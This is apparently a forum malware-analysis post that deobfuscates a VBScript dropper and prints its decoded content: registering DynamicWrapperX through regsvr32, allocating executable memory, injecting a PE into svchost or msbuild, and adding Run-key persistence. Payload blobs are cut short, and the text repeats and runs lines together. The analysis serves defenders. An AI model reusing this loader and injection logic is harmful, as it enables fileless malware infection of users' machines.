- May 14, 2016
- 1,597
From https://malwaretips.com/threads/19-10-2016-11.64615/
Thanks to @Der.Reisende
Why this sample ?
It's easy to deobfuscate the first part, but the real part is very interesting : a dll and file-less malware are inside the script:
Antivirus scan for f0c6e212714e5fa40f38b67d5f59e3afefbd322da1bca2a429f9bb9cb1e0ffdc at 2016-10-19 15:42:57 UTC - VirusTotal
VBScript
1) what it looks like :
dim SUNVBCGETVG ',ë-ö"þ!ëûÿýòÿå(û)ü#÷ûö'ëåïûú"// ðõ&./#ë-ýì
'êêý+êîþêù*óþð),öç!í'û+. þ+'òê..ôô.-/ò!ðì ñ)&ÿ.#èøêïþú'ø(ëü
SUNVBCGETVG = '"13--------------------10--------------------39--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------
...
...=> 1.651.672 chars on the string !
...
"
'ìèûçò(è.(÷æ#ì&/ëêîú!îííèö'ïýû#ê&ïúò"÷&ð"/'ù
'õüêìôñþ/úúöêúÿ!ü'ýñ÷ö#&'ö/&.øïý-$ûþçñìû.íþ&()ó&$ëü'! "+
Execute (CLHHFSRSPXGUHEQJ(SUNVBCGETVG)) '!!èó#æ ì$&%ýùý(ú*þþý( ('øæõ-í/ø%íå(íÿ íé,èè)'%é",
'ü(ñ&îíú(üó ì!()ôû ñö!ýèû""&÷öõ%"øêù$"øõ'õöñ,ùéêóð$ë#ú
Public Function CLHHFSRSPXGUHEQJ(UDTVUMCEZLZJXKC) '÷ç÷%-î%ò),ê-ì+,òðöûýóóôþú(òú*ö.êùï/êþü./øéêéð!"/å+éôù*î
'%þíæ(!çæ$ë-éð&*$ìöøçó*!+óúýù÷óððéü+ê(þí+%íçé
For BSBPIFYBTESIP = len("-") To Len(replace(UDTVUMCEZLZJXKC,"",""))
'ÿ'÷ê#"!û÷÷ç ""þïóè"æý ö*ú.ê)-óõ.&+òæ%&#,+ô'÷ø.ÿ(ðõ)ñ& .!õê.æôå"ê/ý÷.çÿ.*,ùú-
YHRDSIPKZK = replace((Mid(UDTVUMCEZLZJXKC, BSBPIFYBTESIP, 3)),"-",""):CFNXFSGWBHNKTSWQIH = CFNXFSGWBHNKTSWQIH & Chr(YHRDSIPKZK) 'øï(üð" ïüÿ,$ê ïïê ù"öæö& *"#!èæ÷öêó÷î/åñ,&í%òôù(+.$/í,ìý&ìçõ
'üý%ùò,-&ìó.ï-ö&#ýù*ñ/%(,ûïýðþ÷ö*#ï/ü("õøòé+
BSBPIFYBTESIP = BSBPIFYBTESIP + 21 '$æíü÷óñ%"ÿï-+-ý)õþ.õýýèó!íæ#úî ïýöô÷!ð%
'*ø î.-*/éì),ïñ+ñ$*$éç ü!éíðö!åì-åæòîõ&þö.õó"øî++"$ñ%'íî÷
Next 'ìö-î÷%íí(ç-ý-é÷êóé!è#ïúìëè*#
'çí$+,ô-þï#ê/$æ+øíôú%'ýõðôè&ü"íòí-
CLHHFSRSPXGUHEQJ = CFNXFSGWBHNKTSWQIH 'èø/#ëó+çõìø&,ôôú ó÷éì!"#üóðö+.(ùþ-èå
'%úÿûòë#-é((ÿ#þ#ìñöñ)ùå-êþ**øëìñóùõî õ/ çñúù* %ë%(ðõííýüç'!&å%ç/ë#ðî
End Function '&$îç%÷*î+øÿ'%*.ëû$ûúèíèûê ëö#+ëæñùüé
'/+/þ!ó#éôýì.ô#$/ù,ýøæðÿÿíðÿï/(ÿì
2) Deobfuscation :
SUNVBCGETVG :
Execute (CLHHFSRSPXGUHEQJ(SUNVBCGETVG)) :
Public Function CLHHFSRSPXGUHEQJ(UDTVUMCEZLZJXKC)
A loop FOR is used, from index 1 to index "the length of the obfuscated String".
In the loop :
2-3 ) Conclusion for the obfuscation used and Malware part :
3) Explanation of the real content :
3-1) Config / global data :
Here are important data that will be used late, and help the script to make decision (some value tests ) :
We can already see some well known part (if you have already followed some of my posts)
3-2) Constant objects :
'=-=-=-=-= CONSTO =-=-=-=
Several Base64 encoded (very long) Strings are used.
We will see later that :
In VB, a function can return a value, Sub doesn't (other differences, but not important here).
'=-=-=-=-= MYCODE =-=-=-=
start
dcom_name = shellobj.expandenvironmentstrings (install_dir) & "\\" & file_name & ".bin"
host_file = shellobj.expandenvironmentstrings ("%windir%" & "\\" & host_file)
else
host_file = shellobj.expandenvironmentstrings ("%windir%")&"\\microsoft.net\\framework\\v2.0.50727\\msbuild.exe"
end if
write_file dcom_name,texttobinary(dcom_data, "bin.base64")
do
dcom.register "user32.dll", "callwindowprocw",lcase("i=phull"), lcase("r=u")
dcom.register "kernel32.dll", "virtualalloc",lcase("i=puuu"), lcase("r=p")
for i = 0 to ubound (file_data) -1 step 1
loader_ptr = dcom.virtualalloc (0,len(loader_data)/2,4096,64)
for i = 1 to len (loader_data) step 2
count = 0
for i = 0 to ubound (file_data) -1 step 1
Thanks to @Der.Reisende
Why this sample ?
It's easy to deobfuscate the first part, but the real part is very interesting : a dll and file-less malware are inside the script:
=> DynamicWrapperX for DLL function calls.
=> a loader copied on memory
=> a malware binary part copied on memory
=> a loader copied on memory
=> a malware binary part copied on memory
=> injection on targeted the host process
2/52 when postingAntivirus scan for f0c6e212714e5fa40f38b67d5f59e3afefbd322da1bca2a429f9bb9cb1e0ffdc at 2016-10-19 15:42:57 UTC - VirusTotal
VBScript
1) what it looks like :
'ÿæñ$%ý#å.ý"æèö(ì!êþç&#)%åõêó.+ï/ìðë-ÿ%øýð/dim SUNVBCGETVG ',ë-ö"þ!ëûÿýòÿå(û)ü#÷ûö'ëåïûú"// ðõ&./#ë-ýì
'êêý+êîþêù*óþð),öç!í'û+. þ+'òê..ôô.-/ò!ðì ñ)&ÿ.#èøêïþú'ø(ëü
SUNVBCGETVG = '"13--------------------10--------------------39--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------
...
...=> 1.651.672 chars on the string !
...
"
'ìèûçò(è.(÷æ#ì&/ëêîú!îííèö'ïýû#ê&ïúò"÷&ð"/'ù
'õüêìôñþ/úúöêúÿ!ü'ýñ÷ö#&'ö/&.øïý-$ûþçñìû.íþ&()ó&$ëü'! "+
Execute (CLHHFSRSPXGUHEQJ(SUNVBCGETVG)) '!!èó#æ ì$&%ýùý(ú*þþý( ('øæõ-í/ø%íå(íÿ íé,èè)'%é",
'ü(ñ&îíú(üó ì!()ôû ñö!ýèû""&÷öõ%"øêù$"øõ'õöñ,ùéêóð$ë#ú
Public Function CLHHFSRSPXGUHEQJ(UDTVUMCEZLZJXKC) '÷ç÷%-î%ò),ê-ì+,òðöûýóóôþú(òú*ö.êùï/êþü./øéêéð!"/å+éôù*î
'%þíæ(!çæ$ë-éð&*$ìöøçó*!+óúýù÷óððéü+ê(þí+%íçé
For BSBPIFYBTESIP = len("-") To Len(replace(UDTVUMCEZLZJXKC,"",""))
'ÿ'÷ê#"!û÷÷ç ""þïóè"æý ö*ú.ê)-óõ.&+òæ%&#,+ô'÷ø.ÿ(ðõ)ñ& .!õê.æôå"ê/ý÷.çÿ.*,ùú-
YHRDSIPKZK = replace((Mid(UDTVUMCEZLZJXKC, BSBPIFYBTESIP, 3)),"-",""):CFNXFSGWBHNKTSWQIH = CFNXFSGWBHNKTSWQIH & Chr(YHRDSIPKZK) 'øï(üð" ïüÿ,$ê ïïê ù"öæö& *"#!èæ÷öêó÷î/åñ,&í%òôù(+.$/í,ìý&ìçõ
'üý%ùò,-&ìó.ï-ö&#ýù*ñ/%(,ûïýðþ÷ö*#ï/ü("õøòé+
BSBPIFYBTESIP = BSBPIFYBTESIP + 21 '$æíü÷óñ%"ÿï-+-ý)õþ.õýýèó!íæ#úî ïýöô÷!ð%
'*ø î.-*/éì),ïñ+ñ$*$éç ü!éíðö!åì-åæòîõ&þö.õó"øî++"$ñ%'íî÷
Next 'ìö-î÷%íí(ç-ý-é÷êóé!è#ïúìëè*#
'çí$+,ô-þï#ê/$æ+øíôú%'ýõðôè&ü"íòí-
CLHHFSRSPXGUHEQJ = CFNXFSGWBHNKTSWQIH 'èø/#ëó+çõìø&,ôôú ó÷éì!"#üóðö+.(ùþ-èå
'%úÿûòë#-é((ÿ#þ#ìñöñ)ùå-êþ**øëìñóùõî õ/ çñúù* %ë%(ðõííýüç'!&å%ç/ë#ðî
End Function '&$îç%÷*î+øÿ'%*.ëû$ûúèíèûê ëö#+ëæñùüé
'/+/þ!ó#éôýì.ô#$/ù,ýøæðÿÿíðÿï/(ÿì
2) Deobfuscation :
2-1 ) Quick clean :
A lot of part uses the char for comments : ' with useless chars after.
I cleaned it, here are the obfuscated script without false comment parts :
I cleaned it, here are the obfuscated script without false comment parts :
dim SUNVBCGETVG
SUNVBCGETVG = '"13--------------------10--------------------39--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------
...
...=> 1.651.672 chars on the string !
...
"
Execute (CLHHFSRSPXGUHEQJ(SUNVBCGETVG))
Public Function CLHHFSRSPXGUHEQJ(UDTVUMCEZLZJXKC)
2-2 ) How it works :SUNVBCGETVG = '"13--------------------10--------------------39--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------
...
...=> 1.651.672 chars on the string !
...
"
Execute (CLHHFSRSPXGUHEQJ(SUNVBCGETVG))
Public Function CLHHFSRSPXGUHEQJ(UDTVUMCEZLZJXKC)
For BSBPIFYBTESIP = len("-") To Len(replace(UDTVUMCEZLZJXKC,"",""))
End FunctionYHRDSIPKZK = replace((Mid(UDTVUMCEZLZJXKC, BSBPIFYBTESIP, 3)),"-",""):CFNXFSGWBHNKTSWQIH = CFNXFSGWBHNKTSWQIH & Chr(YHRDSIPKZK)
BSBPIFYBTESIP = BSBPIFYBTESIP + 21
CLHHFSRSPXGUHEQJ = CFNXFSGWBHNKTSWQIHBSBPIFYBTESIP = BSBPIFYBTESIP + 21
SUNVBCGETVG :
=> A very long string with the real content, obfuscated.
Execute (CLHHFSRSPXGUHEQJ(SUNVBCGETVG)) :
=> CLHHFSRSPXGUHEQJ(SUNVBCGETVG) : calls a function with the obfuscated string as parameter
=> Execute => evaluate the result
Let's see understand the function.=> Execute => evaluate the result
Public Function CLHHFSRSPXGUHEQJ(UDTVUMCEZLZJXKC)
For BSBPIFYBTESIP = len("-") To Len(replace(UDTVUMCEZLZJXKC,"",""))
End FunctionYHRDSIPKZK = replace((Mid(UDTVUMCEZLZJXKC, BSBPIFYBTESIP, 3)),"-",""):CFNXFSGWBHNKTSWQIH = CFNXFSGWBHNKTSWQIH & Chr(YHRDSIPKZK)
BSBPIFYBTESIP = BSBPIFYBTESIP + 21
CLHHFSRSPXGUHEQJ = CFNXFSGWBHNKTSWQIHBSBPIFYBTESIP = BSBPIFYBTESIP + 21
A loop FOR is used, from index 1 to index "the length of the obfuscated String".
In the loop :
- Mid(UDTVUMCEZLZJXKC, BSBPIFYBTESIP, 3) :
Example :=> retrieve 3 chars on the obfuscated string, from current index, and delete the "-" occurrences
- CFNXFSGWBHNKTSWQIH = CFNXFSGWBHNKTSWQIH & Chr(YHRDSIPKZK)=> add to a string (that was an empty string at the beginning ) the char after a CharCode to char technique :
& Chr(YHRDSIPKZK) : with a string as parameter that represent a decimal number, its equivalent to a char decimal code, and the Chr function gives the char correspondent
- BSBPIFYBTESIP = BSBPIFYBTESIP + 21 :& Chr(YHRDSIPKZK) : with a string as parameter that represent a decimal number, its equivalent to a char decimal code, and the Chr function gives the char correspondent
Index = index +21
Result = ""
index : 1
retrieves "13-"
=> "13"
Result = Result & char("13") => on VBScript & is a concatenation
Result = "\r" => char return
index = index +21 = 22
Next loop:
Result = "\n"
index : 22
retrieves "10-"
=> "10"
Result = Result & char("10") => 10 : ascii for newline : "\n"
Result = "\r\n"
index = index + 21 = 43
Next loop:
Result = "\r\n"
index : 43
retrieves "39-"
=> "39"
Result = Result & char("39") => 39 : ascii for ' (try ALT+39
)
Result = "\r\n'"
index = index + 21 = 43
Etc,..
At the end, it return a String with real bad content, and this string is Executed
index : 1
retrieves "13-"
=> "13"
Result = Result & char("13") => on VBScript & is a concatenation
Result = "\r" => char return
index = index +21 = 22
Next loop:
Result = "\n"
index : 22
retrieves "10-"
=> "10"
Result = Result & char("10") => 10 : ascii for newline : "\n"
Result = "\r\n"
index = index + 21 = 43
Next loop:
Result = "\r\n"
index : 43
retrieves "39-"
=> "39"
Result = Result & char("39") => 39 : ascii for ' (try ALT+39
)Result = "\r\n'"
index = index + 21 = 43
Etc,..
At the end, it return a String with real bad content, and this string is Executed
2-3 ) Conclusion for the obfuscation used and Malware part :
Only decimal ASCII codes on a string with "--------"
Real Content :
I cut a lot of strings that contain long data, to protect you and avoid too much lines
Real Content :
I cut a lot of strings that contain long data, to protect you and avoid too much lines
'=-=-=-=-= CONFIG =-=-=-=
HOST_FILE = "system32\\Svchost.exe"
FILE_NAME = "injector.vbs"
INSTALL_DIR = "%temp%"
START_UP_REG = false
START_UP_TASK = false
START_UP_FOLDER = false
COMMAND_LINE = ""
'=-=-=-=-= CONFIG =-=-=-=
ON ERROR RESUME NEXT
'=-=-=-=-= GLOBAL =-=-=-=
SET FILESYSTEMOBJ = CREATEOBJECT ("SCRIPTING.FILESYSTEMOBJECT")
SET SHELLOBJ = WSCRIPT.CREATEOBJECT ("WSCRIPT.SHELL")
DIM I
'=-=-=-=-= GLOBAL =-=-=-=
'=-=-=-=-= CONSTO =-=-=-=
DCOM_DATA = _
"TVpsAAEAAAACAAAA//8AAAAAAAARAAAAQAAAAAAAAABXaW4zMiBQcm9ncmFtIQ0KJLQJugAB" & _
"zSG0TM0hYAAAAEdvTGluaywgR29Bc20gd3d3LkdvRGV2VG9vbC5jb20AUEUAAEwBBwA1dfhI" & _
...
...
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="
LOADER_DATA = _
"VYvsg8T4U1ZXi30Mi3UIjV38M8BVaP9QQABk/zBkiSDolwcAAIkDiwMFIAEAAFDoEAIAAFDo" & _
"LgIAAFDonAIAAIsTiYIcAQAAiwMFLAIAAFDo7wEAAFCLAwUcAgAAUIsD/5AcAQAAUOhwAgAA" & _
...
...
"AAAAAAAAVmlydHVhbEFsbG9jRXgAAAAAAABWaXJ0dWFsQWxsb2MAAAAAAAAAAFZpcnR1YWxG" & _
"cmVlAAAAAABUZXJtaW5hdGVQcm9jZXNzAAAAAAAAAABHZXRDb21tYW5kTGluZVcAbnRkbGwu" & _
"ZGxsAAAAAAAAAE50VW5tYXBWaWV3T2ZTZWN0aW9uAAAAAA=="
DIM FILE_DATA(10)
FILE_DATA (0) = "r8dBsj08fFQn9bEppowJqKQHJrby/RIW7UaFku4LEGf4AGbYizwN0CQeOrAjwuv08bsyfCU2yWTFw3RfHafgwrZJmhQ1HHVMR9ji2mB2jgjUOz4mWPkU/w58jQ7lL/ixLVXN4cl9yKpyqgBKVrb4LSOI2VVyZ318+qWpkTw4aH16920...
...
HcQ1BqnApX2fk5AuAIf4nh4r5sE1hK5nbe4YJiNrNkyw8CaQqklC5B/r3PkAtdd6mCH6xZOkZ9ZBD8dnxcca91UvxnLuhFtv7cphTajYg=="
FILE_DATA (1) = "twmMywo8/w6GRCk3AFQlOcwH8F53ufKnkayKaBgBKwcAQaYPiFbAFN34Gny6IBCP3xN3E7ZwtIajKPaY4ocVNxRvZAAPhw+xvxuA3Mz0EwpXT/TlreVWiVtWo2xV/wQ9Je/CJD53J+3yCHojmE1FVJUCHXY49JinZBPxNEoeG7YV
...
...
3yyxqzBxUPhsnt4jBLo/7QC+Q+YhWLhkA3P4hSa8NksKQpi+6A1y4BhGKNaVGR7fM/OKMH1cgQ39DS2bnmZtzPlFidmAPh9Anb3UqjGuWT2mIX/2BQ5O7FNI1GAQSpS4Ww+lTxzYJi1YfMhuMQmkdgESlcGOUB0LhCa9fDhL3AR2w=="
FILE_DATA (2) = "glOqrreb+sKq4EjO5ArP9e94gBR1Q+jgOA7Oks+WQ/Zd41US7ZoBG2C6Vj3HN2tgxm7y7oElRnn0yXTFPfBW+OX9dVyQh2rB1XOpuIKiaZjTC98S+2iTkajGVPOrLqnQBGxKgEOKBDKNGVDzMX+g1SYgTJHjdYdreANAWh3oOn5HMS....
...
PT4jyMg37rx8qR8W1v8ttPrlBSqE5AG+V6N+bO592gBWbgcKznqn0wKf8bm5cMb5vUjv3/X5QOmeE5aspAIvKty9PZPESKFGyKt4I29BtVkqND6WtMqvttvQuwgjAtakxNoXyscAhVArCuxmB+wew0PEMuMvvz2INbh9J/lYOlwlrWJjOg=="
FILE_DATA (3) = "WxZwRHaSiMHGatFfQfM3JAaR8jDoAmkneR8b7mhlK+8iKwZgtfZX+tOAstB0L2RRYQBKFvD8Jm62Tmz32uIaVYHWv.DFXaqI5ixYKgUMlmeUTz/L8QIMHu33XqmzsseXFxLO9qHNNuXc48oiKqCTr69ZbdeTENYJJ1Nen/0WS6BBHt...
...
tVhs+TTZZKdQD1457k/2YQLgleCkfvYrgiocw11+GRzgDVno+7gioC9oTGHgoNPO+vh9kAHNNDT/AJwpjnUmd9zxZalXAP3ATs39B0vr4uIrOGOH2/wfnXTRMw7E5o/mGZ4L0EYn6UP17hmOQ5EBsMC0XY7gOk1zxvzsSMRzVAE1HsdMDilcO6GyworcYacAO+feZT1tjFa11t8AU2NivZlfbWoWrQ=="
FILE_DATA (4) = "ZzO6bAUjg6JsyDZemhj37xWh0B6iozPBBi438JzKgSXUlMF0/X9W6h3zBSUoYmDsbHpvGKPfCkBJVgEb+7TLLPnqo+1G0EkO/NlKy7tvgqA8jvAjFAwVvtoIMCCCYh63rCPRnK6P8xjuUCunYppuPTw9yAnizPP2fU8YPD2R9SXQfhzgXC...
...
99OTNPfnpwYrfjefeHNyfYSXUS6Vd2DpB3GewfOCx5jvyTCMXqW/OaU4vYK3sH9MvZOuAt0gimvyL/7HNU4Ocia0eHbe2aKPpkKzVBDzWVwFtFzPEFnBZSrHN0hvw=="
FILE_DATA (5) = "MJNqIdZ1uXStpejnW5CpqDgtnby/vIUOEyh95BhKhc+By5XMH43OhaoQ8DaS/jo1tCyPl2EiMN2HRaLZg7lbjd6b6ic6o.sqhIAmubRGtJ5emVmLxH3avnaiiepZbz+39urg//3TBLlUOGe2j7E03Zubs9e8PywkfpASWjqknNnP1G9KEHg...
...
McJoX08PLHa+QHqh5hSUr54hVadQftCdbcCmTF9vBsdUm6R9IqGYa3AolZ4mFYOnveLcxfDOVOOyWY5xsLlOOGud1y8RJG2aXoQ7MRm1eo5kIHUsDCR9dVem+ArOow=="
FILE_DATA (6) = "x4fzHD8BvenVSFZuBvNL9YJmBjYdSkKDtbtzCek9LJEBw8tVwHEQnSi95n91HnK6AohNfNlPef7njeIpUZQbshBtVipYuo2h5Z+DY7FhVHFjNoh/RSV8chen6q6mds6h0ZkatwnARYUOPMP34hSG44pxellgtramKOFOenOLivA3/bkIiz....
...
Dp58PTJtZOl5yzuTlGdA5F/u9hgZTszlo8/Bbut7NL01rOWFGbZOa1nITRJyy5L/7ruVEALeiymQOzy+LDzaU5ZTc7/Utgfm+VQ7HX54UKfdQjLmLD1DBZTiKEztNcJ5HIYNIW53yaXQ0KZNCA=="
FILE_DATA (7) = "V7YaHTaF8+ho4vZz9FpWiy2/uJV18nQ9hx1ERmGqgMn51Y3YavcBBADiIe33FOYxhGJxmu8zAlCVJizhpCepw4tmpikDkrJnVUhG60VwMrvY2rySeiFhGyOl75bjH+GXlo4Jx1GtEfz0jwAKoEGUgBnXU9i5veroF50DjmGk1oMyrHAF....
...
tCig4hbSu/ZBNpmwrMm14QycNecqJXb+KcyERChxqslnyQ9DeZGu4ODhYTeY+L1uVfQQCJ7yxFHeLA0h5eD4sLsPzQqosnj8ezF58VU/LHsZZNCtWgExr0X+MtdW/CMPVAb+pDynmi3tUpYZRyg=="
FILE_DATA (8) = "6DGvTSwA7nUrhI66OqmEElJTbMPU3DyR6FVnyTbh6gj56u954fvPcxLS197EJOr1BXYSebRNKSAj/TbdqizPsEqLd18m.tFORl5CCLvioHzPKgoAQbbRuPYhz3F+fIg7x4w4nIL2agbubZ/taz6EHRNTdpOOxukKzS7+PvP3IlnJRzyeEncZ...
...
7Rvus5Eq1NxZwGlJwkwPhu5PoSk5dnZ5rrPUdcP0KwFOAK5t+a3PHgLYuzGIQIUItrV2HOrM0fU2ZgPHkcjyQmELUrkpBz7sFHo/KrzI24jmnzhVpLV/TGIESZni7ViJHtw=="
FILE_DATA (9) = ""
FILE_SIZE = 35328
'=-=-=-=-= CONSTO =-=-=-=
'=-=-=-=-= MYCODE =-=-=-=
START
FIX_WOW64
DCOM_NAME = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (INSTALL_DIR) & "\\" & FILE_NAME & ".BIN"
IF NOT IS_DOTNET THEN
HOST_FILE = SHELLOBJ.EXPANDENVIRONMENTSTRINGS ("%WINDIR%" & "\\" & HOST_FILE)
ELSE
HOST_FILE = SHELLOBJ.EXPANDENVIRONMENTSTRINGS ("%WINDIR%")&"\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\MSBUILD.EXE"
END IF
WRITE_FILE DCOM_NAME,TEXTTOBINARY(DCOM_DATA, "BIN.BASE64")
DO
SHELLOBJ.RUN "REGSVR32.EXE /I /S "& CHR(34)&DCOM_NAME& CHR(34),0,TRUE
SET DCOM = CREATEOBJECT("DYNAMICWRAPPERX")
WSCRIPT.SLEEP 1000
LOOP UNTIL ISOBJECT(DCOM)
DCOM.REGISTER "USER32.DLL", "CallWindowProcW",LCASE("I=PHULL"), LCASE("R=U")
DCOM.REGISTER "KERNEL32.DLL", "VirtualAlloc",LCASE("I=PUUU"), LCASE("R=P")
LOADER_DATA = BASE64TOHEX (LOADER_DATA)
FOR I = 0 TO UBOUND (FILE_DATA) -1 STEP 1
FILE_DATA(I) = BASE64TOHEX (FILE_DATA(I))
NEXT
LOADER_PTR = DCOM.VIRTUALALLOC (0,LEN(LOADER_DATA)/2,4096,64)
FOR I = 1 TO LEN (LOADER_DATA) STEP 2
CHAR = ASC(CHR("&H"&MID (LOADER_DATA,I,2)))
DCOM.NUMPUT EVAL(CHAR),LOADER_PTR,(I-1)/2
NEXT
COUNT = 0
PE_PTR = DCOM.VIRTUALALLOC (0,FILE_SIZE+1,4096,64)
FOR I = 0 TO UBOUND (FILE_DATA) -1 STEP 1
FOR X = 1 TO LEN (FILE_DATA(I)) STEP 2
CHAR = ASC(CHR("&H"&MID (FILE_DATA(I),X,2)))
DCOM.NUMPUT EVAL(CHAR),PE_PTR,COUNT
COUNT = COUNT + 1
NEXT
NEXT
DCOM.CALLWINDOWPROCW LOADER_PTR,PE_PTR,DCOM.STRPTR (HOST_FILE),DCOM.STRPTR (COMMAND_LINE),0
SUB FIX_WOW64
SET OBJWMISERVICE = GETOBJECT ("WINMGMTS:\\\\.\\ROOT\\CIMV2")
SET COLITEMS = OBJWMISERVICE.EXECQUERY ("SELECT * FROM WIN32_COMPUTERSYSTEM")
FOR EACH OBJITEM IN COLITEMS
\tSYSTEMTYPE = OBJITEM.SYSTEMTYPE
NEXT
IF (UCASE(SYSTEMTYPE) = "X64-BASED PC") AND (INSTR (UCASE(WSCRIPT.PATH),"SYSWOW64") = 0) THEN
SHELLOBJ.RUN SHELLOBJ.EXPANDENVIRONMENTSTRINGS("%WINDIR%")&"\\SYSWOW64\\WSCRIPT.EXE //b //e:vbscript "&CHR(34)&WSCRIPT.SCRIPTFULLNAME&CHR(34)
WSCRIPT.QUIT
END IF
END SUB
SUB START ()
IF START_UP_REG = TRUE THEN
START_F = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (INSTALL_DIR) & "\\" & FILE_NAME
FILESYSTEMOBJ.COPYFILE WSCRIPT.SCRIPTFULLNAME,START_F ,TRUE
SHELLOBJ.REGWRITE "HKEY_CURRENT_USER\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\" & FILE_NAME,"WScript.exe //b //e:vbscript " & CHRW(34) & START_F & CHRW(34) ,"REG_SZ"
END IF
IF START_UP_FOLDER = TRUE THEN
FILESYSTEMOBJ.COPYFILE WSCRIPT.SCRIPTFULLNAME,SHELLOBJ.SPECIALFOLDERS ("STARTUP") & "\\" & FILE_NAME & ".vbs" ,TRUE
END IF
IF START_UP_TASK = TRUE THEN
END IF
END SUB
FUNCTION BINARYTOTEXT (BINARY, DATATYPE)
FUNCTION TEXTTOBINARY (TEXT, DATATYPE)
FUNCTION BASE64TOHEX(STRBASE64)
FUNCTION WRITE_FILE (FILE_NAME,FILE_DATA)
HOST_FILE = "system32\\Svchost.exe"
FILE_NAME = "injector.vbs"
INSTALL_DIR = "%temp%"
START_UP_REG = false
START_UP_TASK = false
START_UP_FOLDER = false
COMMAND_LINE = ""
'=-=-=-=-= CONFIG =-=-=-=
ON ERROR RESUME NEXT
'=-=-=-=-= GLOBAL =-=-=-=
SET FILESYSTEMOBJ = CREATEOBJECT ("SCRIPTING.FILESYSTEMOBJECT")
SET SHELLOBJ = WSCRIPT.CREATEOBJECT ("WSCRIPT.SHELL")
DIM I
'=-=-=-=-= GLOBAL =-=-=-=
'=-=-=-=-= CONSTO =-=-=-=
DCOM_DATA = _
"TVpsAAEAAAACAAAA//8AAAAAAAARAAAAQAAAAAAAAABXaW4zMiBQcm9ncmFtIQ0KJLQJugAB" & _
"zSG0TM0hYAAAAEdvTGluaywgR29Bc20gd3d3LkdvRGV2VG9vbC5jb20AUEUAAEwBBwA1dfhI" & _
...
...
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="
LOADER_DATA = _
"VYvsg8T4U1ZXi30Mi3UIjV38M8BVaP9QQABk/zBkiSDolwcAAIkDiwMFIAEAAFDoEAIAAFDo" & _
"LgIAAFDonAIAAIsTiYIcAQAAiwMFLAIAAFDo7wEAAFCLAwUcAgAAUIsD/5AcAQAAUOhwAgAA" & _
...
...
"AAAAAAAAVmlydHVhbEFsbG9jRXgAAAAAAABWaXJ0dWFsQWxsb2MAAAAAAAAAAFZpcnR1YWxG" & _
"cmVlAAAAAABUZXJtaW5hdGVQcm9jZXNzAAAAAAAAAABHZXRDb21tYW5kTGluZVcAbnRkbGwu" & _
"ZGxsAAAAAAAAAE50VW5tYXBWaWV3T2ZTZWN0aW9uAAAAAA=="
DIM FILE_DATA(10)
FILE_DATA (0) = "r8dBsj08fFQn9bEppowJqKQHJrby/RIW7UaFku4LEGf4AGbYizwN0CQeOrAjwuv08bsyfCU2yWTFw3RfHafgwrZJmhQ1HHVMR9ji2mB2jgjUOz4mWPkU/w58jQ7lL/ixLVXN4cl9yKpyqgBKVrb4LSOI2VVyZ318+qWpkTw4aH16920...
...
HcQ1BqnApX2fk5AuAIf4nh4r5sE1hK5nbe4YJiNrNkyw8CaQqklC5B/r3PkAtdd6mCH6xZOkZ9ZBD8dnxcca91UvxnLuhFtv7cphTajYg=="
FILE_DATA (1) = "twmMywo8/w6GRCk3AFQlOcwH8F53ufKnkayKaBgBKwcAQaYPiFbAFN34Gny6IBCP3xN3E7ZwtIajKPaY4ocVNxRvZAAPhw+xvxuA3Mz0EwpXT/TlreVWiVtWo2xV/wQ9Je/CJD53J+3yCHojmE1FVJUCHXY49JinZBPxNEoeG7YV
...
...
3yyxqzBxUPhsnt4jBLo/7QC+Q+YhWLhkA3P4hSa8NksKQpi+6A1y4BhGKNaVGR7fM/OKMH1cgQ39DS2bnmZtzPlFidmAPh9Anb3UqjGuWT2mIX/2BQ5O7FNI1GAQSpS4Ww+lTxzYJi1YfMhuMQmkdgESlcGOUB0LhCa9fDhL3AR2w=="
FILE_DATA (2) = "glOqrreb+sKq4EjO5ArP9e94gBR1Q+jgOA7Oks+WQ/Zd41US7ZoBG2C6Vj3HN2tgxm7y7oElRnn0yXTFPfBW+OX9dVyQh2rB1XOpuIKiaZjTC98S+2iTkajGVPOrLqnQBGxKgEOKBDKNGVDzMX+g1SYgTJHjdYdreANAWh3oOn5HMS....
...
PT4jyMg37rx8qR8W1v8ttPrlBSqE5AG+V6N+bO592gBWbgcKznqn0wKf8bm5cMb5vUjv3/X5QOmeE5aspAIvKty9PZPESKFGyKt4I29BtVkqND6WtMqvttvQuwgjAtakxNoXyscAhVArCuxmB+wew0PEMuMvvz2INbh9J/lYOlwlrWJjOg=="
FILE_DATA (3) = "WxZwRHaSiMHGatFfQfM3JAaR8jDoAmkneR8b7mhlK+8iKwZgtfZX+tOAstB0L2RRYQBKFvD8Jm62Tmz32uIaVYHWv.DFXaqI5ixYKgUMlmeUTz/L8QIMHu33XqmzsseXFxLO9qHNNuXc48oiKqCTr69ZbdeTENYJJ1Nen/0WS6BBHt...
...
tVhs+TTZZKdQD1457k/2YQLgleCkfvYrgiocw11+GRzgDVno+7gioC9oTGHgoNPO+vh9kAHNNDT/AJwpjnUmd9zxZalXAP3ATs39B0vr4uIrOGOH2/wfnXTRMw7E5o/mGZ4L0EYn6UP17hmOQ5EBsMC0XY7gOk1zxvzsSMRzVAE1HsdMDilcO6GyworcYacAO+feZT1tjFa11t8AU2NivZlfbWoWrQ=="
FILE_DATA (4) = "ZzO6bAUjg6JsyDZemhj37xWh0B6iozPBBi438JzKgSXUlMF0/X9W6h3zBSUoYmDsbHpvGKPfCkBJVgEb+7TLLPnqo+1G0EkO/NlKy7tvgqA8jvAjFAwVvtoIMCCCYh63rCPRnK6P8xjuUCunYppuPTw9yAnizPP2fU8YPD2R9SXQfhzgXC...
...
